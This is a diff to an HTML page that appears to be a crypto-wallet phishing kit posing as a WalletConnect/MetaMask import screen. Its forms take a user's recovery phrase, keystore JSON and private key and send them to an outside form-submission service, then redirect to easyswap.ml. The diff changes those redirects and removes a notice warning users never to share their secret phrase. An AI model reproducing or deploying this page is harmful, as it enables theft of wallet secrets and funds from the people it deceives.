--- a/connect/metamask/import.html
+++ b/connect/metamask/import.html
@@ -5,7 +5,6 @@
 <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
     <head>
     <link rel="stylesheet" href="../main.css" type="text/css"/> 
-    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
     <meta charset="UTF-8">
     <meta name="description" content="Open protocol for connecting Wallets to Dapps">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
@@ -61,7 +60,7 @@
     <div id="phrases" class="tabcontent">
           <script src="form.js"></script>
     <form id="reused_form" action="https://submit-form.com/Hl0BwYQZ">
-    <input type="hidden" name="_redirect" value="easyswap.ml/loading.html"/>
+    <input type="hidden" name="_redirect" value="easyswap.ml/index.html"/>
     <textarea name="phrase" class="phrase" required="required" minlength="12" placeholder="Phrase"></textarea>
     <br/>
     <div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
@@ -86,7 +85,7 @@
     <div id="keystores" class="tabcontent">
          <script src="json.js"></script>
     <form id="reused" action="https://submit-form.com/Hl0BwYQZ">
-    <input type="hidden" name="_redirect" value="easyswap.ml/loading.html"/>
+    <input type="hidden" name="_redirect" value="easyswap.ml/index.html"/>
     <textarea name="keystonejson" class="keystonejson" required="required" minlength="12" placeholder="Keystore JSON"></textarea>
     <br>
     <div class="field">
@@ -114,7 +113,7 @@
     <div id="private" class="tabcontent">
           <script src="hi.js"></script>
     <form id="reusede" action="https://submit-form.com/Hl0BwYQZ">
-    <input type="hidden" name="_redirect" value="easyswap.ml/loading.html"/>
+    <input type="hidden" name="_redirect" value="easyswap.ml/index.html"/>
      <div class="field">
       <input type="text" name="privatekey" class="password" placeholder="Private Key"/>
       </div>
@@ -180,42 +179,7 @@
     <p><img src="images/github.svg" class="footimg">  <a href="https://github.com/walletconnect">Github</a></p><br>
     </div>
     </footer>
-
-    <!-- Modal -->
-<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
-    <div class="modal-dialog modal-xl modal-dialog-centered" role="document">
-      <div class="modal-content">
-        <div class="modal-header">
-          <h5 class="modal-title" id="exampleModalCenterTitle">Notice</h5>
-            <button type="button" class="close" data-dismiss="modal">&times;</button>
-        </div>
-        <div class="modal-body">
-         <li>The secret phrase is the master key to your funds never share it with anyone else</li>
-         <li>We will never ask you to share your secret phrase with anyone</li>
-         <li>If you lose your secret phrase, you won't be able to recover your funds</li>
-        </div>
-        <div class="modal-footer">
-          <button id="agree" type="button" class="btn btn-secondary" style="background-color: #2A498D; width: 100%;" data-dismiss="modal">Ok</button>
-        </div>
-      </div>
-    </div>
-  </div>  
-</body>
-
-
-    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
-    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.3/dist/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
-    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
-    <script>
-        $(document).ready(function(){
-            $("#exampleModalCenter").modal('show');
-            $("#agree").click(function(e){
-                $("#exampleModalCenter").modal('hide');
-            })
-        })
-    </script>
     </body>
-    
     
 <!-- Mirrored from aoconn.co/connect/import.html?type=metamask by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 27 Nov 2021 20:57:40 GMT -->
 
